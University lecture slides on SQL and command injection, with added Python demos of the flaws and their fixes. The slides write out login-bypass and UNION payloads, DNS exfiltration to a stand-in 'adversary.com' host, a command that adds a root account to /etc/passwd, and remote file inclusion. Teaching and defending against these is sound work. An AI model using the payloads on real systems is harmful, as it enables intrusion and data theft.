CE441: Data and Network Security - Injection Attacks
ce.sharif.edu/~b_momeni/ce441/10-injection.pdf

CE441: Data and Network Security
Injection Attacks

Behnam Momeni, PhD
Department of Computer Engineering
Sharif University of Technology
Fall 2019

B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 1 / 36


Outline

1 SQL Injection
    SQLi Exploitation Technique: In-band Data Retrieval
    SQLi Exploitation Technique: In-band Inferential Attack
    SQLi Exploitation Technique: Out-of-band Data Retrieval
    SQLi Countermeasures: Input Sanitization
    SQLi Countermeasures: Parameterized Query

2 Command Injection

Section: SQL Injection / SQLi Exploitation Technique: In-band Data Retrieval

Injection Attacks

When data items are converted from one format to another format...
    ...due to type ambiguity, untrusted inputs might be mixed with trusted inputs
    ...and change the meaning of the produced output, injecting new control elements
XSS vulnerabilities were a subset of the injection vulnerabilities
    Trusted control element: "<a href='/test.html'>...</a>"
    Untrusted input element: "$_GET['title']"
    title=<script>alert('XSS');</script>
    When converted to the string format to create the HTTP response, it injects new control elements (i.e. the <script>)

    <?php
    // the untrusted title is interpolated into the HTML output without escaping
    echo "<a href='/test.html'>{$_GET['title']}</a>";
    ?>

Structured Query Language (SQL) Injection

SQL allows a web application (the Database client) to communicate with a Database and perform CRUD:
    Create new records with the INSERT command
    Read existing records with the SELECT command
    Update existing records with the UPDATE command
    Delete existing records with the DELETE command
Formatted as a string, and so vulnerable to type ambiguity issues if data inputs are not properly encoded to be distinguished from the SQL keywords

SQL Injection (SQLi) - Example Vulnerable Code

    <?php
    $mysqli = new mysqli("localhost", "my_user", "my_password", "database_name");
    if ($mysqli->connect_errno) {
        printf("Connect failed: %s\n", $mysqli->connect_error);
        exit();
    }
    // the untrusted POST value is concatenated directly into the query text
    if ($result = $mysqli->query("SELECT Name FROM City "
            . "WHERE Population < " . $_POST["max_population"])) {
        printf("Query returned %d rows.\n", $result->num_rows);
        process($result);   // application-specific handling of the result set
        $result->close();
    }
    $mysqli->close();
    ?>

Basic picture: SQL Injection

(Figure) Attacker, Victim Server, Victim SQL DB:
    1. The attacker posts a malicious form to the victim server
    2. The server sends an unintended SQL query to the victim SQL DB
    3. The attacker receives valuable data

Borrowed from [40442-971:09-web-site-sec.pdf], page 12

Example: buggy login page (ASP)

    set ok = execute( "SELECT * FROM Users WHERE user=' " & form("user") & " ' AND pwd=' " & form("pwd") & " '" );
    if not ok.EOF
        login success
    else fail;

Is this exploitable?

Borrowed from [40442-971:09-web-site-sec.pdf], page 15

Normal Query

(Figure) Web Browser (Client), Web Server, DB:
    The user enters Username & Password in the browser; the web server sends the DB

    SELECT * FROM Users
    WHERE user='me' AND pwd='1234'

Borrowed from [40442-971:09-web-site-sec.pdf], page 16

Bad input

Suppose user = " ' or 1=1 -- " (URL encoded)
Then the script does: ok = execute( SELECT ... WHERE user= ' ' or 1=1 -- ... )
    The "--" causes the rest of the line to be ignored.
    Now ok.EOF is always false and login succeeds.
The bad news: easy login to many sites this way.

Borrowed from [40442-971:09-web-site-sec.pdf], page 17

In-band Data Retrieval: Error-based SQL Injection

Improper error-handling allows the adversary to observe SQL query errors
    ...observe actual data values
    ...and learn the query structure based on the observed errors
e.g. to learn the query structure:
    You have an error in your SQL syntax near '12345678, 123.04, 0, )' at line 2.
e.g. to learn the actual data values:
    ...compute the actual value in a subquery and use it in a way that causes an error

    SELECT * FROM Users WHERE username='ali' AND
        EXTRACTVALUE(rand(),CONCAT(0x0a,(the-sub-query)))--

In-band Data Retrieval: UNION-based SQL Injection

Sometimes, the error message is not shown to the user, but the query results are displayed themselves
    e.g. a player's scores in a game
Extra information from other tables can be extracted ...using a UNION query

    SELECT lvl, score FROM Scores WHERE player='ali'
    UNION SELECT username, password FROM Users

Second-Order SQL Injection

When untrusted user input is stored in the database ...by proper escaping and without causing SQL injection ...it might be read back and used in yet another SQL query
If developers wrongly trust the data (which is read from the database) ...it can cause a second-order SQL injection

    UPDATE Users SET password='newpassphrase'
    WHERE username='admin' AND password='oldpassphrase'

    UPDATE Users SET password='newpassphrase'
    WHERE username='admin' --' AND password='random-password'
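Added example (Python, not from the slides): the second-order flow above, run end to end against an in-memory SQLite table. The table, the registered name admin' -- and the passwords are constructed for this demo. The vulnerable function trusts the username it reads back from the database and concatenates it into the UPDATE, exactly as the slide's second statement shows; the safe variant binds the same value as a parameter.

```python
import sqlite3

def make_db():
    # Constructed sample table (not from the slides): one admin account.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (username TEXT PRIMARY KEY, password TEXT)")
    con.execute("INSERT INTO Users VALUES ('admin', 'oldpassphrase')")
    return con

def register(con, username, password):
    # First-order use is safe: the name is bound as a parameter, so a value
    # such as  admin' --  is stored literally and causes no injection here.
    con.execute("INSERT INTO Users VALUES (?, ?)", (username, password))

def change_password_vulnerable(con, username, old_password, new_password):
    # Second-order bug: the username read back from the database is trusted
    # and concatenated into a new statement, where the stored quote and "--"
    # become SQL syntax and comment out the old-password check.
    row = con.execute("SELECT username FROM Users WHERE username=?",
                      (username,)).fetchone()
    stored_name = row[0]
    sql = ("UPDATE Users SET password='" + new_password + "' "
           "WHERE username='" + stored_name + "' AND password='" + old_password + "'")
    return con.execute(sql).rowcount

def change_password_safe(con, username, old_password, new_password):
    # Fix: data read from the database is still data; bind it as a parameter.
    row = con.execute("SELECT username FROM Users WHERE username=?",
                      (username,)).fetchone()
    return con.execute(
        "UPDATE Users SET password=? WHERE username=? AND password=?",
        (new_password, row[0], old_password)).rowcount

def admin_password(con):
    return con.execute(
        "SELECT password FROM Users WHERE username='admin'").fetchone()[0]

def demo():
    """Register the name  admin' --  and then 'change its password' giving a
    wrong old password; return admin's password after the vulnerable update
    and after the safe one."""
    con = make_db()
    register(con, "admin' --", "whatever")
    change_password_vulnerable(con, "admin' --", "random-password", "newpassphrase")
    after_vulnerable = admin_password(con)   # admin's password was replaced
    con = make_db()
    register(con, "admin' --", "whatever")
    change_password_safe(con, "admin' --", "random-password", "newpassphrase")
    after_safe = admin_password(con)         # admin's password is untouched
    return after_vulnerable, after_safe
```

The registration step is correctly parameterized, which is the point of the slide: escaping or binding at the first query does not make the stored value trustworthy for the second one, so every statement that uses it must bind it again.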

SQLi Is A Functionality Bug Too

A subset of inputs (which corrupt the query) cannot be used

Image Ref: https://www.xkcd.com/327/

Section: SQL Injection / SQLi Exploitation Technique: In-band Inferential Attack

In-band Inferential Attack: Boolean-based

Sometimes, data cannot be retrieved directly
    Neither error messages are displayed ...nor query results are shown to users
But the rendered page reflects some state read from the database
    e.g. when the query is not well-formed, a generic error page is shown
    e.g. when the query has some non-empty results, a button is enabled
These boolean-based differences (normal page vs. error page) leak a single bit of information about the database
    Also called a blind SQL injection

In-band Inferential Attack: Time-based

Sometimes, the state of the database, independent of the SQL injection, is not reflected in the HTTP response
    e.g. a second query blocks/abandons the SQL injection results
Although not even a bit of information can be extracted through the HTTP response body, the SQL injection can affect the overall response time
If a true or false condition is detected in the injected query, it may run through a fast or slow path to differentiate the two scenarios

    SELECT * FROM User WHERE username='admin'
    AND password='1234'
    OR IF(SUBSTRING(password,1,1)<'h',SLEEP(2),0)=0 --'

Section: SQL Injection / SQLi Exploitation Technique: Out-of-band Data Retrieval

Out-of-band Data Retrieval

Data exfiltration is possible through an independent channel
    e.g. writing into a file which is served by an HTTP server
    e.g. exporting to a remote server directly
    e.g. loading data & leaking some data through the URL
    e.g. leaking data through a DNS request
Significantly speeds up the exfiltration process (in comparison to blind scenarios)
    but requires the FILE privilege, which might be unavailable

    SELECT 'any-data' INTO OUTFILE '/var/www/html/data.txt';
    SELECT 'any-data' INTO DUMPFILE '\\\\1.2.3.4\\data.txt';
    SELECT LOAD_FILE('\\\\1.2.3.4\\somedata');
    LOAD DATA INFILE '\\\\1.2.3.4\\somedata' INTO TABLE Temp;
    SELECT LOAD_FILE(CONCAT('\\\\',
        (some_query_with_one_row_result), '.adversary.com\\'))

Section: SQL Injection / SQLi Countermeasures: Input Sanitization

SQLi Countermeasures: Input Sanitization (1/3)

The untrusted input might contain SQL keywords
    Solution 1: detect and remove SQL keywords
Pitfall: SELINSERTECT → SELECT
    (removing the keyword INSERT once splices the remaining characters into the keyword SELECT)


SQLi Countermeasures: Input Sanitization (2/3)

The untrusted input might contain SQL keywords
    Solution 2: enclose input in quotations and escape quotations
    e.g. username='1\' OR 1=1 --'
Pitfall: username='1\' OR 1=1 --'
    → username='1\\' OR 1=1 --'
    (only the quote was escaped; the attacker's own backslash now escapes the added backslash, so the following quote still closes the string)


SQLi Countermeasures: Input Sanitization (3/3)

The untrusted input might contain SQL keywords
    Solution 3: use a library to properly escape quotations

    <?php
    $username = addslashes("' OR 1=1 --");   // escapes both ' and \
    $query = "... username='".$username."' AND ...";
    ?>

Pitfall: Encoding Attacks!
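Added example (Python, not from the slides): the three sanitization attempts from the preceding slides, checked against what the SQL parser actually sees. A small reader for MySQL-style single-quoted literals (my own code, handling \x and '' escapes) decodes the literal that each escaper produces and reports the text left over after it; a non-empty remainder means the input broke out of the string. The keyword list and the inputs are constructed, except for the SELINSERTECT and 1\' OR 1=1 -- values, which are the slides' own.

```python
import re

# Constructed keyword list for the naive "detect and remove" filter (Solution 1).
SQL_KEYWORDS = ("SELECT", "INSERT", "UPDATE", "DELETE", "UNION")

def strip_keywords_once(value):
    # One pass per keyword: removing one keyword can splice another together.
    for kw in SQL_KEYWORDS:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value

def escape_quotes_only(value):
    # Solution 2 as shown on the slide: the quote is escaped, the backslash is not.
    return value.replace("'", "\\'")

def addslashes(value):
    # Solution 3, addslashes-style: the backslash first, then the quote.
    return value.replace("\\", "\\\\").replace("'", "\\'")

def read_mysql_literal(sql, start):
    """Read a single-quoted literal with MySQL-style backslash escapes that
    begins at sql[start]; return (decoded value, index after the closing quote)."""
    if sql[start] != "'":
        raise ValueError("no string literal at offset %d" % start)
    out, i = [], start + 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\" and i + 1 < len(sql):                          # \x -> x
            out.append(sql[i + 1]); i += 2
        elif ch == "'" and i + 1 < len(sql) and sql[i + 1] == "'":   # '' -> '
            out.append("'"); i += 2
        elif ch == "'":                                               # closing quote
            return "".join(out), i + 1
        else:
            out.append(ch); i += 1
    raise ValueError("unterminated string literal")

def literal_and_tail(escaper, username):
    """Build  username='<escaped>'  and report what the parser sees: the
    literal's value and whatever SQL text follows the literal."""
    sql = "username='" + escaper(username) + "'"
    value, end = read_mysql_literal(sql, len("username="))
    return value, sql[end:]
```

With escape_quotes_only the literal ends after 1\ and the parser continues with OR 1=1 --' as SQL; with addslashes the whole input is recovered as data and nothing follows the literal. The next slides show why even the addslashes form is not the end of the story.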


Encoding Attacks: The Homoglyphs Feature!

The Microsoft SQL Server supports Unicode characters
    e.g. the NVARCHAR and NCHAR types or N'strings'
During implicit or explicit conversion from a Unicode type to a non-Unicode type, SQL Server automatically replaces characters with their most visually similar counterparts (i.e. homoglyphs) in the target character set

    -- http://sqlfiddle.com/#!18/9eecb/63575
    SELECT CAST(N'ŚℇℒℇℂƮʼ' AS nchar) AS UnicodeChar,
           CAST(N'ŚℇℒℇℂƮʼ' AS char) AS NonUnicodeChar

    UnicodeChar    NonUnicodeChar
    ŚℇℒℇℂƮʼ        SELECT'

Encoding Attacks: Non-Shortest Form UTF-8

UTF-8 characters use a variable-length coding
    One byte for common Latin characters
    Two bytes for most of the other languages
    Longer codes for rare symbols including emoji characters (U+263A)
It is possible to encode any one-byte character using a two-byte character too, but it is illegal to use these non-shortest forms
The single-quote character is represented as 39 (0x27) ...it can also be represented as 0xC0A7
The addslashes function scans for 0x27 bytes
    Solution: mysqli_real_escape_string

    # Codepoint Bits | First Valid Codepoint | Last Valid Codepoint | Byte 1    | Byte 2    | Byte 3    | Byte 4
    7                | U+0000                | U+007F               | 0xxx xxxx | unused    | unused    | unused
    11               | U+0080                | U+07FF               | 110x xxxx | 10xx xxxx | unused    | unused
    16               | U+0800                | U+FFFF               | 1110 xxxx | 10xx xxxx | 10xx xxxx | unused
    21               | U+10000               | U+10FFFF             | 1111 0xxx | 10xx xxxx | 10xx xxxx | 10xx xxxx

Encoding Attacks: Consuming Escape Characters

In Asian encodings such as Guojia Biaozhun Kuozhan (GBK), a standard for the simplified Chinese characters, a valid multi-byte character might have the escape character as a suffix
    0xBF 0x27 (where 0x27 represents a single-quote in ASCII) might be escaped by adding a backslash, which is represented by 0x5C in ASCII
    → 0xBF 0x5C 0x27
    But 0xBF5C is a valid Chinese character in GBK...
    → 0xBF5C 0x27 (non-escaped single-quote)
In UTF-8, no multi-byte character might be terminated by 0x5C
    However, a wrong implementation might consume extra invalid bytes (a 0xC0 byte indicates a character with two bytes, which might consume the following 0x5C even though it is less than 0x80)
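Added example (Python, not from the slides): the two byte-level failure modes of the last two slides, reproduced on constructed input. A byte-wise addslashes-style escaper is applied to (a) the bytes 0xBF 0x27, whose result is then decoded as GBK, and (b) the overlong 0xC0 0xA7 form of the quote, which is then decoded by a lenient decoder written from the slide's bit-pattern table without the shortest-form check, and by Python's strict codec. escape_charset_aware is my sketch of the idea behind mysqli_real_escape_string (decode with the connection charset before escaping); it is not that function's code.

```python
def escape_quotes_bytewise(data):
    # addslashes-style escaping on raw bytes: only 0x5C and 0x27 are
    # inspected, with no knowledge of the connection character set.
    return data.replace(b"\\", b"\\\\").replace(b"'", b"\\'")

def decode_utf8_lenient(data):
    """UTF-8 decoder built from the bit patterns on the slide but WITHOUT
    rejecting non-shortest forms: the 'wrong implementation' case."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, n = b, 1
        elif b & 0xE0 == 0xC0:
            cp, n = b & 0x1F, 2
        elif b & 0xF0 == 0xE0:
            cp, n = b & 0x0F, 3
        elif b & 0xF8 == 0xF0:
            cp, n = b & 0x07, 4
        else:
            raise ValueError("invalid lead byte at offset %d" % i)
        if i + n > len(data):
            raise ValueError("truncated sequence at offset %d" % i)
        for k in range(1, n):
            cont = data[i + k]
            if cont & 0xC0 != 0x80:
                raise ValueError("invalid continuation byte at offset %d" % (i + k))
            cp = (cp << 6) | (cont & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)

def gbk_case():
    # Constructed input from the slide: lead byte 0xBF followed by an ASCII quote.
    raw = b"\xbf'"
    escaped = escape_quotes_bytewise(raw)    # 0xBF 0x5C 0x27
    decoded = escaped.decode("gbk")          # 0xBF5C is one character; 0x27 survives
    return escaped, decoded

def overlong_case():
    raw = b"\xc0\xa7"                        # non-shortest form of U+0027
    escaped = escape_quotes_bytewise(raw)    # unchanged: there is no 0x27 byte to see
    lenient = decode_utf8_lenient(escaped)   # the quote reappears after decoding
    try:
        escaped.decode("utf-8")              # strict codec rejects the overlong form
        strict_accepts = True
    except UnicodeDecodeError:
        strict_accepts = False
    return escaped, lenient, strict_accepts

def escape_charset_aware(data, charset):
    """Decode with the connection charset first, so malformed bytes are
    rejected, then escape at the character level. Returns None when the
    bytes are not valid in that charset."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'")
```

Both cases have the same shape: the escaper and the database disagree about where character boundaries are. Escaping after a strict decode in the charset the database will use removes that disagreement, which is why the slide points at mysqli_real_escape_string rather than addslashes; parameterized queries (next section) avoid the problem entirely.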

Section: SQL Injection / SQLi Countermeasures: Parameterized Query

SQLi Countermeasures: Parameterized Query

The root cause of SQL injection vulnerabilities was the type ambiguity
    It can be fixed by not mixing the query and user inputs
    Inputs are passed separately as parameters
    The query is prepared beforehand and can be reused ...(re)executed with a set of parameter values

    <?php
    $stmt = mysqli_prepare($link, "SELECT username FROM Users WHERE username=? AND password=?");
    mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
    $username = $_POST['usr']; // variables are linked
    $password = $_POST['pwd']; // by reference
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $res_username);
    while (mysqli_stmt_fetch($stmt)) {
        printf("%s\n", $res_username);
    }
    mysqli_stmt_close($stmt);
    ?>
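Added example (Python, not from the slides): the buggy login from the earlier ASP slide and the parameterized form from this slide, side by side on an in-memory SQLite table, each tried with a normal credential and with the ' or 1=1 -- input from the "Bad input" slide. The accounts are constructed for the demo; SQLite's ? placeholders play the role of the mysqli ones.

```python
import sqlite3

def make_db():
    # Constructed sample accounts (not from the slides).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("me", "1234"), ("admin", "s3cret")])
    return con

def login_concat(con, user, pwd):
    # The buggy login from the ASP slide, rebuilt with string concatenation:
    # the untrusted values become part of the SQL text that gets parsed.
    sql = "SELECT * FROM Users WHERE user='" + user + "' AND pwd='" + pwd + "'"
    return con.execute(sql).fetchone() is not None

def login_prepared(con, user, pwd):
    # Parameterized query: the statement text is fixed, the values are bound
    # separately, so a quote or "--" in the input is compared as data and
    # never reaches the SQL parser.
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return con.execute(sql, (user, pwd)).fetchone() is not None

def demo():
    con = make_db()
    bad_user = "' or 1=1 --"          # the input from the "Bad input" slide
    return {
        "normal_concat": login_concat(con, "me", "1234"),
        "normal_prepared": login_prepared(con, "me", "1234"),
        "bypass_concat": login_concat(con, bad_user, "anything"),
        "bypass_prepared": login_prepared(con, bad_user, "anything"),
    }
```

The concatenated version accepts the tautology because the comment swallows the password check; the prepared version simply looks for a user literally named ' or 1=1 -- and finds none. The same prepared statement can be re-executed with other parameter tuples (executemany in SQLite, repeated mysqli_stmt_execute on the slide) without re-parsing the SQL.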

Outline

1 SQL Injection

2 Command Injection
    Remote Code Execution (RCE)
    File Inclusion

Section: Command Injection / Remote Code Execution (RCE)

Remote Code Execution (RCE)

Dynamic evaluation of untrusted user input
    e.g. a calculator
    ...requires careful input sanitization to prevent code execution

    <?php
    $f = $_GET['formula']; // 2+3*4
    eval("\$f = $f;");     // the untrusted formula is evaluated as PHP code
    echo "Result: $f";
    ?>

Code injection using system()

Example: PHP server-side code for sending email

    $email = $_POST["email"]
    $subject = $_POST["subject"]
    system("mail $email -s $subject < /tmp/joinmynetwork")

Attacker can post
    http://yourdomain.com/mail.php? [email protected] & subject=foo < /usr/passwd; ls
OR
    http://yourdomain.com/mail.php? [email protected]&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

Borrowed from [40442-971:09-web-site-sec.pdf], page 9
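Added example (Python, not from the slides): what a POSIX shell makes of the mail command line above when the subject is attacker-controlled, and two ways to build it safely. The address is constructed; the subject is the one from the slide's first URL. The tokenizer is shlex configured to report ; < > | & as separate operator tokens, which is enough to show where the command boundary moves; the argv form is the one that removes the shell from the picture.

```python
import shlex

def build_command_vulnerable(email, subject):
    # The slide's pattern: untrusted values interpolated into a shell command line.
    return "mail %s -s %s < /tmp/joinmynetwork" % (email, subject)

def build_command_quoted(email, subject):
    # Fix 1: each untrusted value wrapped by shlex.quote stays one shell word.
    return "mail %s -s %s < /tmp/joinmynetwork" % (shlex.quote(email),
                                                   shlex.quote(subject))

def build_argv(email, subject):
    # Fix 2 (preferred): no shell at all. Passing this list to subprocess.run
    # means separators and redirections inside the values are never interpreted.
    return ["mail", email, "-s", subject]

def shell_words(command):
    """Split a command line the way a POSIX shell would, returning the
    operator characters ; < > | & as tokens of their own."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)

def demo():
    email = "alice@example.com"              # constructed
    subject = "foo < /usr/passwd; ls"        # the slide's injected subject
    return {
        "vulnerable": shell_words(build_command_vulnerable(email, subject)),
        "quoted": shell_words(build_command_quoted(email, subject)),
        "argv": build_argv(email, subject),
    }
```

In the vulnerable token list the ; ends the mail command and ls starts a second one; in the quoted list the whole subject is a single word, and in the argv list there is no tokenization step for the attacker to influence at all.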

Section: Command Injection / File Inclusion

Local File Inclusion (LFI)

The server-side script might run a sub-script based on user input
    The sub-script is locally present on the server
The adversary might be able to choose & run unexpected scripts
    e.g. some script from another folder (directory traversal)
    e.g. some text file which was uploaded by the adversary beforehand

    <?php
    include("subroutines/" . $_GET['routine_name']);
    // ../../private/authorized/backend.php
    // ../upload/evilshell.txt
    ?>

LFI Countermeasure

Do not pass user input into the file inclusion constructs
    But check the user input and use some constant string based on it
Suboptimal solutions:
    limit the file extension
    mitigate relative paths

    <?php
    if ($_GET['routine_name'] === 'register') {
        include("subroutines/register.php");
    } elseif ($_GET['routine_name'] === 'greet') {
        include("subroutines/greetings.php");
    } else {
        die("bad routine name");
    }
    ?>
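Added example (Python, not from the slides): the allow-list countermeasure from this slide next to the path-containment check it calls suboptimal, both tried on the traversal inputs from the LFI slide and on the scheme-style inputs shown on the two slides that follow. BASE_DIR, the routine table and the file names are constructed for the demo; posixpath is used so the result does not depend on the host platform.

```python
import posixpath

BASE_DIR = "/srv/app/subroutines"      # assumed location of the sub-scripts

# Countermeasure from the slide: user input only selects a constant; the
# request value itself never becomes part of the path.
ROUTINES = {
    "register": "register.php",
    "greet": "greetings.php",
}

def resolve_allowlist(routine_name):
    filename = ROUTINES.get(routine_name)
    if filename is None:
        return None                     # the slide's die("bad routine name") case
    return posixpath.join(BASE_DIR, filename)

def resolve_contained(routine_name):
    """The 'limit the extension / mitigate relative paths' approach: force a
    .php suffix, normalise the joined path and require that it still lies
    inside BASE_DIR. Weaker than the allow-list, but it does stop traversal."""
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, routine_name + ".php"))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None                     # escaped the directory through ..
    return candidate
```

Note the difference on a php://filter or http:// value: the allow-list rejects it outright, while the containment check accepts it, because with a constant prefix in front it is no longer a URL scheme but merely an odd file name under BASE_DIR (the point the RFI slide makes about prefixes). The containment check still has to be combined with the fixed extension to keep an uploaded .txt from being included as code.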

Obtaining Source Files Using LFI

If the adversary can select arbitrary schemes for an LFI case, one possible selection would be to enable PHP filters
    Ref: https://www.php.net/manual/en/filters.php
For example,
    http://example.com/index.php?f=php://filter/convert.base64-encode/resource=index
...the index.php resource will be base64-encoded and returned

    <?php
    include($_GET['f'] . ".php");
    ?>

Remote File Inclusion (RFI)

When no prefix is used while specifying the included file URI, the adversary can use any scheme and include remote files too
In PHP, allow_url_include should be on for RFI to work
The remote (hosted) script is downloaded and executed by the server

    <?php
    include($_GET['routine_name'] . ".php");
    // http://adversary.com/evil
    ?>

References and Further Reading

[40442-971:09-web-site-sec.pdf] Mehdi Kharrazi, "CE 442/Computer and Network Security - Lecture 9 - Web Application Security," Sharif University of Technology, Online: http://sharif.edu/~kharrazi/courses/40442-971/09-web-site-sec.pdf, 2018

[homogplyphs-injection] Bert Wagner, "ʼ;ŚℇℒℇℂƮ *: How Unicode Homoglyphs Will Break Your Custom SQL Injection Sanitizing Functions," HackerNoon, Online: http://hackernoon.storage.googleapis.com/%CA%BC-%C5%9B%E2%84%87%E2%84%92%E2%84%87%E2%84%82%CA%88-how-unicode-homoglyphs-will-break-your-custom-sql-injection-sanitizing-functions-1224377f7b51, 2017

[overlong-utf8] Eduardo Vela, "A couple of unicode issues on PHP and Firefox," SirDarckCat Blog, Online: http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html, 2009

[consuming-utf8-bytes] Chris Shiflett, "addslashes() Versus mysql_real_escape_string()," Shiflett Blog, Online: http://shiflett.org/blog/2006/addslashes-versus-mysql-real-escape-string, 2006